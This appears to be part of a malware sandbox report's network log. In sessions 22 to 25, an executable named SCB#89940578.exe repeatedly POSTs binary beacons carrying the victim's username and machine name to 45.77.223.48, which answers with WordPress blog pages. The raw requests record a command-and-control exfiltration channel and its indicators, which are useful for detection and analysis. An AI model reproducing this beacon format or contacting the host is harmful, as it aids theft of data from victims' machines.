Apr 26, 2024 04:42:35.607136965 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:35.794982910 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:36.697896957 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:35 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:36.698009968 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:36.698024988 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:36.705193043 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:36.705355883 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:36.705552101 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:36.705620050 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:36.705749989 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:36.705849886 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:36.706067085 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49764	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:37.043735027 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:37.232678890 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:38.170217991 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:37 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:38.170311928 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:38.170370102 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:38.178224087 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:38.178570986 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:38.178637028 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:38.178733110 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:38.178906918 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:38.178941965 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:38.179009914 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49765	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:38.508836031 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:38.696513891 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:39.559355974 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:38 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:39.559556007 CEST	64	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
Apr 26, 2024 04:42:39.559628963 CEST	77	IN	Data Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:39.572813034 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:39.573214054 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:39.573529959 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:39.573616982 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:39.573712111 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:39.573837996 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:39.573941946 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49766	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:39.893816948 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:40.391865015 CEST	395	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:41.327425003 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:40 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:41.327804089 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:41.327816010 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:41.337239027 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:41.337577105 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:41.337651968 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:41.337783098 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:41.337949991 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:41.338071108 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:41.338155031 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:42:41.514303923 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49767	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:41.660722971 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:41.849893093 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:42.965972900 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:41 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:42.966023922 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:42.966092110 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:42.983936071 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:42.984520912 CEST	166	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
